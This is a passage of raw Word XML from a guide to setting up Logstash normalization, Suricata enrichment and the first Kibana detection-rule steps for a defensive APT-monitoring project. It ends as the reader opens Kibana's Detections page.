              <w:t>Grok parse failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F064839" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
            <w:r w:rsidRPr="00645538">
              <w:t>Use the Grok Debugger in Kibana → Dev Tools → Grok Debugger</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00645538" w:rsidRPr="00645538" w14:paraId="2C489A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EE9E2" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
            <w:r w:rsidRPr="00645538">
              <w:lastRenderedPageBreak/>
              <w:t>Missing fields</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57DF4AE2" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
            <w:r w:rsidRPr="00645538">
              <w:t>Double-check field names ([log][file][path] vs [source][path])</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00645538" w:rsidRPr="00645538" w14:paraId="2D4966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7C372" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
            <w:r w:rsidRPr="00645538">
              <w:t>Logstash high CPU</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59F1D370" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
            <w:r w:rsidRPr="00645538">
              <w:t>Disable debug output (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00645538">
              <w:t>stdout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00645538">
              <w:t>) after testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00645538" w:rsidRPr="00645538" w14:paraId="67FBB1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DF89" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
            <w:r w:rsidRPr="00645538">
              <w:t>Elasticsearch rejects events</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21197073" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
            <w:r w:rsidRPr="00645538">
              <w:t>Check mappings → too long field names or unmapped data types</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3DE7F1F4" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Useful tool:</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId53" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00645538">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://grokdebugger.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> (for testing Grok regexes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0639FC94" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="523F7AD0">
          <v:rect id="_x0000_i1096" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="799B728F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🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.9 Example: Suricata Enrichment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B86CC03" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>If you integrated Suricata earlier (Step 4), add extra mapping:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4D76DD" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>filter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD5EC13" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  if [event][source] == "network" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCE9567" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    mutate {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C467E0A" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">      rename =&gt; { "[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>src_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>]" =&gt; "[source][</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>]" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275E1582" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">      rename =&gt; { "[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>dest_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>]" =&gt; "[destination][</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>]" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6BE7D4" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A9946B" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    if [alert][signature] {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AFB600" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">      mutate { </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>add_field</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> =&gt; { "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>event.action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>" =&gt; "%{[alert][signature]}" } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E5CB68" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB93177" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AB9685" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBA428F" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="68574CE9">
          <v:rect id="_x0000_i1097" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A98446A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📘</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.10 Helpful references</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E854F88" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">ECS (Elastic Common Schema): </w:t>
      </w:r>
      <w:hyperlink r:id="rId54" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00645538">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/ecs/current/ecs-reference.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B48D0A6" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>GeoIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> setup: </w:t>
      </w:r>
      <w:hyperlink r:id="rId55" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00645538">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/logstash/current/plugins-filters-geoip.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="23794BA5" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Threat Intel plugin: </w:t>
      </w:r>
      <w:hyperlink r:id="rId56" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00645538">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/logstash/current/plugins-filters-translate.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F57BC86" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Grok patterns: </w:t>
      </w:r>
      <w:hyperlink r:id="rId57" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00645538">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/logstash/current/plugins-filters-grok.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="63E85ABC" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="782E6E31">
          <v:rect id="_x0000_i1098" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EDDA74" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.11 Deliverables after Step 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E26D28" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Working Logstash pipelines under </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>/pipeline/:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27826948" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="70"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:lastRenderedPageBreak/>
        <w:t>05-normalization.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510DA926" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="70"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t>05-enrichment.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141F0746" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="70"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t>05-output.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0566D490" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t>Clean, structured indices in Elasticsearch (normalized-logs-*)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F53A67" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Kibana Discover views showing parsed fields and enrichment (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>GeoIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> country, severity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECE740F" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t>Screenshots in docs/screenshots/normalization-results.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314739D8" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t>Short markdown note explaining pipeline logic (docs/pipeline-notes.md)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35200134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🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 6 — Detection Rules &amp; Dashboards for APTs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DAE868" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="2E08EC37">
          <v:rect id="_x0000_i1099" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1412A052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🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Goal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299D28A8" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>Use the structured, enriched data in Elasticsearch to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2D77B9" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">Detect </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>APT tactics</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> (like credential dumping, lateral movement, exfiltration, PowerShell misuse).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24569AA6" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">Create </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>real-time alerts</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> and visualizations in Kibana.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29778CC0" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">Map detections to </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5F6F4C" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">Build </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>interactive dashboards</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> for the judges to see your system’s intelligence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3DB6BC" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="275AD013">
          <v:rect id="_x0000_i1100" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C983B5D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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 6.1 — Understanding Detection Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572A3C4B" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>Your ELK now stores clean JSON logs like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A57FD77" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA36724" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">  "user.name": "admin",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B8B0A9" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">  "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>source.ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t>": "192.168.1.22",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5E227A" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">  "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>event.action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t>": "Failed password",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095D8F6B" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">  "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>event.module</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t>": "auth",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6553C154" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">  "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>mitre.technique</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t>": "T1110.001",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592C9BF7" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">  "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>geoip.country_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t>": "Unknown"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F683484" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB36100" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">You’ll now tell Kibana </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>what patterns mean “attack”</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>KQL (Kibana Query Language)</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EQL (Event Query Language)</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9D2DEB" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="61ED376D">
          <v:rect id="_x0000_i1101" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F76005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⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 6.2 — Create Detection Rules in Kibana (Security App)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782B7CE0" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1️</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Open Detection Engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37628E25" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">In Kibana → click </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“Security”</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“Detections”</w:t>
      </w:r>
